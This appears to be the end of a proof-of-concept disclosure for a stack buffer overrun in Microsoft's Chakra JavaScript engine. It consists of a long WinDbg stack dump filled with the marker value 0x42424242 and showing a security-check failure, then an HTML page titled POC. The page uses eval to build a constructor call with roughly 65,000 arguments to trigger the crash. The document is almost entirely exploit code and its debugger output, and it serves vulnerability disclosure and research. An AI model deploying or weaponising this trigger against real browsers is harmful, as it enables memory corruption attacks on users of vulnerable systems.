00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
0:016> g

STATUS_STACK_BUFFER_OVERRUN encountered
(1590.b70): Break instruction exception - code 80000003 (first chance)
KERNELBASE!UnhandledExceptionFilter+0x85960:
00007ffe`9e61c120 cc              int     3
0:016> kb
RetAddr           : Args to Child                                                           : Call Site
00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960
00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a
00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169
00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38
00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd
00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368
00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e
00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d
00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5
00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242
00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242


-->
<html>
<head>
<title> POC </title>
</head>
<script>

var a = '0x42424242,'.repeat(0xFFFF-2); 
var b = "function Car(){} var car = new Car(a,"+a+"a);";
eval(b);

</script>
</html>